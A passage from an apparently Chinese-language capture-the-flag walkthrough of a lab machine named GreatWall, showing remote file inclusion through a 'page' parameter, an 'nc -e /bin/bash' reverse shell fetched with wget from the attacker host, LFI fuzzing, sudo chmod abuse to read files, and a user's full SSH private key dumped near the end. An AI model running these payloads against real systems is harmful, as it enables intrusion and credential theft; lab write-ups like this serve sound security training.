src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103379.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618135938520\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u6210\u529f\u6267\u884c\u547d\u4ee4\uff0c\u5c1d\u8bd5\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ chmod +x revshell.sh \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ head revshell.sh \nnc -e \/bin\/bash 192.168.10.128 1234\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ls -la revshell.\nls: cannot access &#039;revshell.&#039;: No such file or directory\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ls -la revshell.sh \n-rwxrwxr-x 1 kali kali 36 Jun 18 02:11 revshell.sh\n\nhttp:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&amp;cmd=wget http:\/\/192.168.10.128\/revshell.sh -O \/tmp\/revshell.sh\nhttp:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&amp;cmd=ls -la \/tmp\/revshell.sh\n# -rw-r--r-- 1 www-data www-data 36 Jun 18 14:11 \/tmp\/revshell.sh\n# \u65e0\u6cd5\u4fee\u6539\u6743\u9650\u3002\u3002\u3002\u3002\u3002<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6587\u4ef6\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&amp;cmd=cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\nwall:x:1000:1000:wall,,,:\/home\/wall:\/bin\/bash<\/code><\/pre>\n<p>\u8fd8\u662f\u8001\u8001\u5b9e\u5b9e\u770b\u6e90\u4ee3\u7801\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/webshell.jpg&amp;cmd=cat index.php<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\nif (isset($_GET[&#039;page&#039;])) {\n$page = $_GET[&#039;page&#039;];\n\nif (!preg_match(&#039;\/^(file|https?):\\\/\\\/\/i&#039;, $page)) {\necho &#039;nonono~&#039;;\nreturn;\n}\n\nif (preg_match(&#039;\/^https?:\\\/\\\/(www\\.)?google\\.com\\\/?$\/i&#039;, $page)) {\necho &#039;gulugulu~&#039;;\nreturn;\n}\n\n@include($page);\n}\n?&gt;<\/code><\/pre>\n<ul>\n<li>\u8981\u6c42\u5b57\u7b26\u4e32<strong>\u5f00\u5934<\/strong>\u5fc5\u987b\u662f <code>file:\/\/<\/code>\u3001<code>http:\/\/<\/code> \u6216 <code>https:\/\/<\/code><\/li>\n<li>\u5c4f\u853d\u4e86\u7279\u5b9a\u57df\u540d<\/li>\n<li>\u6587\u4ef6\u5305\u542b<\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code>http:\/\/192.168.10.129\/?page=file:\/\/\/etc\/passwd<\/code><\/pre>\n<p>\u6210\u529f\u56de\u663e\u3002\u3002\u3002\u6240\u4ee5\u6211\u4e00\u76f4\u5728\u548c\u7a7a\u6c14\u6597\u667a\u6597\u52c7\uff1f\uff1f\uff1f\uff1f<\/p>\n<h3>FUZZ<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ffuf -c -u &quot;http:\/\/192.168.10.129\/?page=file:\/\/FUZZ&quot; -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-Jhaddix.txt -fw 1235 2&gt;\/dev\/null \n\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd [Status: 200, Size: 4250, Words: 1239, Lines: 134, Duration: 12ms]\n\/etc\/apt\/sources.list   [Status: 200, Size: 3569, Words: 1261, Lines: 116, Duration: 3ms]\n\/etc\/fstab              [Status: 200, Size: 3999, Words: 1414, Lines: 127, Duration: 4ms]\n\/etc\/apache2\/apache2.conf [Status: 200, Size: 10371, Words: 2169, Lines: 337, Duration: 3ms]\n\/etc\/crontab            [Status: 200, Size: 4235, Words: 1411, Lines: 134, Duration: 3ms]\n\/etc\/hosts.allow        [Status: 200, Size: 3604, Words: 1316, Lines: 122, Duration: 13ms]\n\/etc\/hosts              [Status: 200, Size: 3382, Words: 1253, Lines: 119, Duration: 17ms]\n\/etc\/hosts.deny         [Status: 200, Size: 3904, Words: 1362, Lines: 129, Duration: 28ms]\n\/etc\/nsswitch.conf      [Status: 200, Size: 3687, Words: 1363, Lines: 132, Duration: 3ms]\n\/etc\/netconfig          [Status: 200, Size: 3960, Words: 1523, Lines: 131, Duration: 4ms]\n\/etc\/passwd             [Status: 200, Size: 4250, Words: 1239, Lines: 134, Duration: 1ms]\n\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/etc\/passwd [Status: 200, Size: 4250, Words: 1239, Lines: 134, Duration: 3ms]\n\/etc\/issue              [Status: 200, Size: 3220, Words: 1239, Lines: 114, Duration: 3ms]\n\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 4250, Words: 1239, Lines: 134, Duration: 2ms]\n\/etc\/init.d\/apache2     [Status: 200, Size: 11332, Words: 2727, Lines: 465, Duration: 4ms]\n\/etc\/resolv.conf        [Status: 200, Size: 3255, Words: 1238, Lines: 115, Duration: 2ms]\n\/etc\/rpc                [Status: 200, Size: 4104, Words: 1271, Lines: 153, Duration: 1ms]\n\/etc\/ssh\/sshd_config    [Status: 200, Size: 6401, Words: 1521, Lines: 234, Duration: 3ms]\n\/proc\/net\/route         [Status: 200, Size: 3577, Words: 1449, Lines: 115, Duration: 4ms]\n\/proc\/net\/tcp           [Status: 200, Size: 3493, Words: 1358, Lines: 114, Duration: 6ms]\n\/proc\/interrupts        [Status: 200, Size: 8774, Words: 4490, Lines: 178, Duration: 5ms]\n\/proc\/loadavg           [Status: 200, Size: 3219, Words: 1239, Lines: 113, Duration: 6ms]\n\/proc\/net\/dev           [Status: 200, Size: 3639, Words: 1485, Lines: 116, Duration: 6ms]\n\/proc\/mounts            [Status: 200, Size: 5074, Words: 1355, Lines: 136, Duration: 6ms]\n\/proc\/meminfo           [Status: 200, Size: 4696, Words: 1774, Lines: 166, Duration: 4ms]\n\/proc\/partitions        [Status: 200, Size: 3340, Words: 1309, Lines: 118, Duration: 2ms]\n\/proc\/net\/arp           [Status: 200, Size: 3503, Words: 1380, Lines: 116, Duration: 4ms]\n\/proc\/self\/cmdline      [Status: 200, Size: 3271, Words: 1237, Lines: 112, Duration: 1ms]\n\/proc\/cpuinfo           [Status: 200, Size: 7869, Words: 1803, Lines: 220, Duration: 5ms]\n\/proc\/version           [Status: 200, Size: 3382, Words: 1255, Lines: 113, Duration: 5ms]\n\/proc\/self\/status       [Status: 200, Size: 4616, Words: 1326, Lines: 169, Duration: 5ms]\n\/var\/log\/lastlog        [Status: 200, Size: 295485, Words: 1236, Lines: 112, Duration: 2ms]\n\/var\/log\/wtmp           [Status: 200, Size: 90745, Words: 1301, Lines: 174, Duration: 8ms]\n\/\/\/\/\/\/\/..\/..\/..\/etc\/passwd [Status: 200, Size: 4250, Words: 1239, Lines: 134, Duration: 5ms]<\/code><\/pre>\n<p>\u67e5\u4e86\u4e00\u4e9b\u6ca1\u53d1\u73b0\u75d5\u8ff9\uff0c<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103380.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103380.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618151718927\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5404\u79cd\u53cd\u5f39shell\u90fd\u6ca1\u7528\u3002\u3002\u3002\u3002\u731c\u6d4b\u53ef\u80fd\u662f\u56e0\u4e3a\u8bf7\u6c42\u7684\u662f\u5916\u90e8\u6587\u4ef6\uff0c\u65e0\u6cd5\u5bf9\u672c\u5730\u73af\u5883\u8fdb\u884c\u4fee\u6539\uff0c\u5c1d\u8bd5\u4e0b\u8f7d\u53cd\u5f39shell\u5230\u7f51\u7ad9\u76ee\u5f55\u518d\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<blockquote>\n<p>\u4e2d\u95f4\u91cd\u65b0\u914d\u7f6e\u4e86\u4e00\u4e0bvmware\u865a\u62df\u7f51\u7edc\uff0c\u6545IP\u53d1\u751f\u4e86\u4e00\u70b9\u53d8\u5316\uff1a<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\"># http:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/webshell.jpg&amp;cmd=id\nhttp:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/webshell.jpg&amp;cmd=wget http:\/\/192.168.182.128\/revshell.php -O \/var\/www\/html\/revshell.php\nhttp:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/webshell.jpg&cmd=pwd\n# total 12\n# drwxr-xr-x 2 root root 4096 May 11 02:07 .\n# drwxr-xr-x 3 root root 4096 May 10 19:18 ..\n# -rw-r--r-- 1 root root 3646 May 11 02:07 index.php<\/code><\/pre>\n<p>\u53d1\u73b0\u6ca1\u6709\u5199\u7684\u6743\u9650\uff0c\u5c1d\u8bd5\u6362\u4e00\u4e2a\u76ee\u5f55\u8bd5\u8bd5\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/webshell.jpg&amp;cmd=wget http:\/\/192.168.182.128\/revshell.php -O \/var\/tmp\/revshell.php\nhttp:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/webshell.jpg&amp;cmd=ls -la \/var\/tmp\/revshell.php\n# total 20\n# drwxrwxrwt  4 root     root     4096 Jun 18 22:44 .\n# drwxr-xr-x 12 root     root     4096 May 10 19:18 ..\n# -rw-r--r--  1 www-data www-data 3913 Jun 18 22:36 revshell.php\n# drwx------  3 root     root     4096 Jun 18 22:32 systemd-private-5fdfb580855d4b458ba6ce1501508a88-apache2.service-LJlBee\n# drwx------  3 root     root     4096 Jun 18 22:32 systemd-private-5fdfb580855d4b458ba6ce1501508a88-systemd-logind.service-7k7Q7J<\/code><\/pre>\n<blockquote>\n<p><code>drwxrwxrwt<\/code>\u7684t\uff1a\u4ec5\u5f53\u4f5c\u7528\u4e8e\u76ee\u5f55\u65f6\u6709\u6548\u3002<strong>\u5373\u4f7f\u5176\u4ed6\u7528\u6237\u6709\u5199\u6743\u9650\uff08<code>w<\/code>\uff09\uff0c\u4e5f\u53ea\u80fd\u5220\u9664\u81ea\u5df1\u521b\u5efa\u7684\u6587\u4ef6\/\u76ee\u5f55<\/strong>\uff0c\u65e0\u6cd5\u5220\u9664\u5176\u4ed6\u7528\u6237\u7684\u6587\u4ef6\uff08\u9700\u6240\u6709\u8005\u6216 <code>root<\/code> \u624d\u80fd\u5220\u9664\uff09\u82e5\u540c\u65f6\u6709 <code>x<\/code>\uff08\u6267\u884c\u6743\u9650\uff09\uff0c\u663e\u793a\u4e3a\u5c0f\u5199 <code>t<\/code>\uff08\u5982 <code>rwt<\/code>\uff09\uff1b\u82e5\u65e0 <code>x<\/code> \u6743\u9650\uff0c\u663e\u793a\u4e3a\u5927\u5199 <code>T<\/code>\uff08\u5982 <code>rwT<\/code>\uff09\uff0c\u6b64\u65f6\u7c98\u6ede\u4f4d\u65e0\u6548<\/p>\n<\/blockquote>\n<p>\u8bf4\u660e\u62e5\u6709\u6267\u884c\u6743\u9650\u3002\u3002\u3002\u3002<\/p>\n<p>\u7136\u540e\u6211\u7ffb\u4e86\u4e00\u4e0b<a href=\"https:\/\/pepster.me\/MazeSec-GreatWall-Walkthrough\/\">\u57ce\u5357\u7684wp<\/a>\uff0c\u53d1\u73b0\u8bbe\u7f6e\u4e86<code>iptables<\/code>\uff0c\u4e0d\u5141\u8bb8\u6d41\u91cf\u51fa\u7ad9\uff0c\u5176\u5b9e\u5f88\u65e9\u5c31\u6709\u76f8\u5173\u7684\u73b0\u8c61\uff0c\u6bd4\u5982\u524d\u9762\u7684\u6267\u884c\u547d\u4ee4\u4e86\uff0c\u4f46\u5e76\u672a\u53cd\u5f39\uff0c\u4ee5\u53ca\u6211\u4e00\u5f00\u59cb\u4ee5\u4e3a\u7684\u957f\u5ea6\u8fc7\u957f\u5bfc\u81f4\u65e0\u6cd5\u8fdc\u7a0b\u5305\u542b\u7684\u73b0\u8c61\uff0c\u6211\u5c45\u7136\u4e00\u76f4\u89c6\u800c\u4e0d\u89c1\u3002\u3002\u3002\u3002\u3002\u503c\u5f97\u53cd\u601d\u3002\u3002\u3002<\/p>\n<h3>iptables\u6d41\u91cf\u4e0d\u51fa\u7ad9<\/h3>\n<p>\u4e00\u4e9b\u4e4b\u524d\u5e94\u8be5\u505a\u7684\u4f46\u662f\u6211\u6f0f\u6389\u7684\u5728\u8fd9\u91cc\u8fdb\u884c\u4e00\u5b9a\u7684\u8bb0\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ echo &#039;&lt;?php phpinfo();?&gt;&#039; &gt; phpinfo.php \n# http:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/phpinfo.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103381.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103381.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618234001639\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5141\u8bb8\u5305\u542b\u3002\u3002\u3002\u53ea\u9700\u8981\u5c06\u53cd\u5f39shell\u7684\u7aef\u53e3\u8bbe\u7f6e\u4e3a<code>80<\/code>\u5373\u53ef\uff0c\u6211\u6709\u8fc7\u731c\u60f3\u4f46\u7ec8\u5f52\u6ca1\u6709\u4ed8\u8bf8\u5b9e\u8df5\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.182.129\/?page=http:\/\/192.168.182.128\/revshell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103382.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103382.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618234239548\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53cd\u5f39\u8fc7\u6765\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u7a33\u5b9ashell<\/h3>\n<pre><code class=\"language-bash\">python3 -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nexport TERM=xterm\nCtrl + Z\n# stty size\nstty raw -echo; fg\nstty rows 50 columns 200<\/code><\/pre>\n<h3>sudo chmod\u8bfb\u53d6\u79c1\u94a5<\/h3>\n<p>\u5177\u4f53\u4e0d\u4f1a\u53ef\u4ee5\u53c2\u8003\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/chmod\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/chmod\/#sudo<\/a><\/p>\n<p>\u603b\u4e4b\u5c31\u662f\u9047\u5230\u5565\u5c31\u5e72\u6389\u5565\u5c31\u597d\u4e86\uff0c\u8bb0\u5f97\u6062\u590d\u6743\u9650\uff0c\u4e0d\u7136 ssh \u65e0\u6cd5\u6b63\u5e38\u8fdb\u884c\u767b\u5f55\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">www-data@greatwall:\/tmp$ cd ~\nwww-data@greatwall:~$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 May 10 19:18 .\ndrwxr-xr-x 12 root root 4096 May 10 19:18 ..\ndrwxr-xr-x  2 root root 4096 May 11 02:07 html\nwww-data@greatwall:~$ cd \/home\nwww-data@greatwall:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 May 10 18:54 .\ndrwxr-xr-x 18 root root 4096 May 10 18:53 ..\ndrwx------  4 wall wall 4096 May 11 02:41 wall\nwww-data@greatwall:\/home$ cd wall\nbash: cd: wall: Permission denied\nwww-data@greatwall:\/home$ sudo -l\nMatching Defaults entries for www-data on greatwall:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser www-data may run the following commands on greatwall:\n    (wall) NOPASSWD: \/bin\/chmod\nwww-data@greatwall:\/home$ sudo -u wall \/bin\/chmod 777 \/home\/wall\/\nwww-data@greatwall:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 May 10 18:54 .\ndrwxr-xr-x 18 root root 4096 May 10 18:53 ..\ndrwxrwxrwx  4 wall wall 4096 May 11 02:41 wall\nwww-data@greatwall:\/home$ cd wall\nwww-data@greatwall:\/home\/wall$ ls -la\ntotal 32\ndrwxrwxrwx 4 wall wall 4096 May 11 02:41 .\ndrwxr-xr-x 3 root root 4096 May 10 18:54 ..\nlrwxrwxrwx 1 root root    9 May 11 00:15 .bash_history -&gt; \/dev\/null\n-rwx------ 1 wall wall  220 May 10 18:54 .bash_logout\n-rwx------ 1 wall wall 3526 May 10 18:54 .bashrc\ndrwx------ 3 wall wall 4096 May 11 00:18 .local\n-rwx------ 1 wall wall  807 May 10 18:54 .profile\ndrwxr-xr-x 2 wall wall 4096 May 11 02:41 .ssh\n-rwx------ 1 wall wall 1808 May 11 00:25 user.flag\nwww-data@greatwall:\/home\/wall$ sudo -u wall \/bin\/chmod 777 user.flag \nwww-data@greatwall:\/home\/wall$ cat user.flag \n                                                          .&#039;.      \n                                                      .&#039;:ldd.      \n                                                  .,:oddddd:       \n                                              .,cdddddddddd        \n                                          .,cddddddddddddd:        \n                                      .;lddddddddddddddddd.        \n                                  .;lddddddddddddddddddddl         \n                              .,cddddddddddddccoddddddddd.         \n                          .;cdddddddddddddl,.:ddddddddddc          \n                     .&#039;;lddddddddddddddo;. ,dddddddddddd.          \n                 .&#039;:lddddddddddddddddc.  &#039;oddddddddddddc           \n             .&#039;:odddddddddddddddddl,   .cdddddddddddddd.           \n         .&#039;:oddddddddddddddddddd:.    ;dddddddddddddddo            \n      &#039;;lddddddddddddddddddddl,     &#039;odddddddddddddddd&#039;            \n       ..,:lodddddddddddddo;.     .cdddddddddddddddddl             \n             ..&#039;;codddddc.      .:ddddddddddddddddddd.             \n                    ..&#039;        ,ddddddddddddddddddddc              \n                              ;ldddddddddddddddddddd.              \n                                 ..&#039;;clddddddddddddc               \n                                        ..,:loddddd.               \n                             .c:,..           ..&#039;,:                \n                             &#039;ddddd&#039;                               \n                             &#039;dddl.                                \n                             ,dd,                                  \n                             ;o.                                   \n                             .                                     \n\nflag{b088764475fa2a0a962fb9154f41c5b6}\nwww-data@greatwall:\/home\/wall$ cd .ssh\nwww-data@greatwall:\/home\/wall\/.ssh$ ls -la\ntotal 20\ndrwxr-xr-x 2 wall wall 4096 May 11 02:41 .\ndrwxrwxrwx 4 wall wall 4096 May 11 02:41 ..\n-rw-r--r-- 1 wall wall  568 May 11 02:41 authorized_keys\n-rw------- 1 wall wall 2602 May 11 02:41 id_rsa\n-rw-r--r-- 1 wall wall  568 May 11 02:41 id_rsa.pub\nwww-data@greatwall:\/home\/wall\/.ssh$ sudo -u wall \/bin\/chmod 777 id_rsa\nwww-data@greatwall:\/home\/wall\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEA6yJfWc4tk8pNs4Em7Kpgb7kqMmqqB1wv6RDfLhVbaGkWlhuAPxX8\nuGmbAob6\/8J8fneffjGnQET7hTNsVUakFl7ra1VSL1u6GSyaIXgyYJl7Vp7TXb9J\/\/Iw+I\nT3ry30pss+AKfDwHyV43YZk\/xYjP20k8CCFgDzsGT\/qNwwjLKziWfxKGFZClyQuyjkoxzL\nvIoDBRNO3KkzdYhTz\/TZU0mWB1eGV74jX7W0\/lddtMyDt7imrzPn0sqMwf4\/J6ZpMWMy3y\nOjr4rgBntCEGuOgZi9YLG3gheQw0ieyOR9h\/AJntwKkMRd7B9AqfCQlI1dXnjEDWObBwBD\nfa4lDoKecxIK0gfiTiSflMxLRqfzIwuRZEL\/PUNCz\/RiQ2MBicOdUOI2w6ZF9fqoULYCRY\n2vBqp+nL83fyLW7aZvKNmhkkAwF7yd5WrFaecv5wpMuI1504IBnmTIwnx+ImswOSzDr6av\n+FDyaQ7fBGvgc6JPOqLna5Ewg6j368IHNDmN0q6fAAAFiE3mdfRN5nX0AAAAB3NzaC1yc2\nEAAAGBAOsiX1nOLZPKTbOBJuyqYG+5KjJqqgdcL+kQ3y4VW2hpFpYbgD8V\/LhpmwKG+v\/C\nfH53n34xp0BE+4UzbFVGpBZe62tVUi9buhksmiF4MmCZe1ae012\/Sf\/yMPiE968t9KbLPg\nCnw8B8leN2GZP8WIz9tJPAghYA87Bk\/6jcMIyys4ln8ShhWQpckLso5KMcy7yKAwUTTtyp\nM3WIU8\/02VNJlgdXhle+I1+1tP5XXbTMg7e4pq8z59LKjMH+PyemaTFjMt8jo6+K4AZ7Qh\nBrjoGYvWCxt4IXkMNInsjkfYfwCZ7cCpDEXewfQKnwkJSNXV54xA1jmwcAQ32uJQ6CnnMS\nCtIH4k4kn5TMS0an8yMLkWRC\/z1DQs\/0YkNjAYnDnVDiNsOmRfX6qFC2AkWNrwaqfpy\/N3\n8i1u2mbyjZoZJAMBe8neVqxWnnL+cKTLiNedOCAZ5kyMJ8fiJrMDksw6+mr\/hQ8mkO3wRr\n4HOiTzqi52uRMIOo9+vCBzQ5jdKunwAAAAMBAAEAAAGAL97PF8r8h3ar7AwyvwMO4CAMAb\niqhhYUIPiQ32J0uiSO9x+BNBbHXUoOx2xwpGpViy\/SdlAok1KX\/G3UM+ZOWMmZV0BHG6Iq\nmJ52gLLmWrlUnXV3ZcIgkC2gH7B+dpk+EkkVhe+h0EntACKWoYTCCG5Mebo7Ibyu4C4nyJ\nqPfc2R9LsHI2fyR0RCKQBxz+14Yxmb9MgSCaWe9uI64f8g0a6ND1CX5rwsmns1boSd7MWo\nWVqMAOZp34XiM0qOVAWyR\/YmLi37rkIxk3qQPvMRooGJL1KL4Szlv\/2FEGPwh3Tdyz1\/Ys\nOxCb1D8k9yD\/zbBFZ9ybnI6byo7kFceFuPuCv3jzAyLi+YxCgDi7FEH\/NOg6UMG+oN7hus\nIDwP2vU6iKNW4WccM9KuGvFTYfrTeXE2mLgTY4KaZIj\/8Omf3XpKO4Of6zP8dOAsbECi4K\nrJc\/nX6an0siiK\/4P43uhM\/DWhaXjSOSotyJ9MbwxXHfGPz0PkFECpqzm64YMwjKKVAAAA\nwD9H1Z4qlfJ7igJ9tbvBKxrD073ywNtOoItuSab4yeG8EeU24x66HSWzrT6bQ+\/KuV35aK\nbeC9oPcNmVp1DBunfCoUdA544QuY9V2u3GMwxexRzzFoMInvgPBvzLHcFc+JS7m3iZ5qIU\n0VAN\/6x1Y69HAo4h2EtB6PWT4pKFnbKFuPIgSrMfaKy0r+Lbo2oFwtS+KO9Okk9o+\/Niia\nHRmj8aoI+UilcsO6RjcuuKp4euGDdzr06oVrb1uUseoNkWtwAAAMEA+DTwCdrJOd6blGJm\n1eMe6sGglfvRDq67zwPOX1HtU\/XxS30dwEmno1VqisH6Fa3DKBp8C2NCA2K1o8Pav9VqT5\nc3vNJLe1ezKFYkvXervh6remPS5HPkpyn4Irhd5pjO8PqvrrDGjHEgcAaUsiIM9JyTDETY\nRUS90nSAOFaeyONRow9WCLY12wRPWn3FMvVGQJ0RJfSyWnsTv7YOa51hDXYlNAXCcNWCVF\nsNPiTb5FiyzoXaZZa6UnddKJKrNraFAAAAwQDyhFvxPwhK1MiShSbpJ9kOw5\/l5NFSZyKf\n4UqE2yh7K+2OZLeQ4hgoVnP17D4JPZ4fbifsXejWiN4VHr4f0mBq0oXkLqB6BwM0AjDw1t\n8yNNSDFjwIagasiPHWcsjg6xi09kNFYvw20bQNjhDF4yh\/bNieYpjyqlzaKdZEVnG2kPnv\nXqKg7j4rnHclz+HWgwHf+zBGq3a7QKSHs0XqM+Uh54Y6JOphHFLljpV6c6cKQjqB0u4fSP\nQMXdH6a7iy89MAAAAOd2FsbEBncmVhdHdhbGwBAgMEBQ==\n-----END OPENSSH PRIVATE 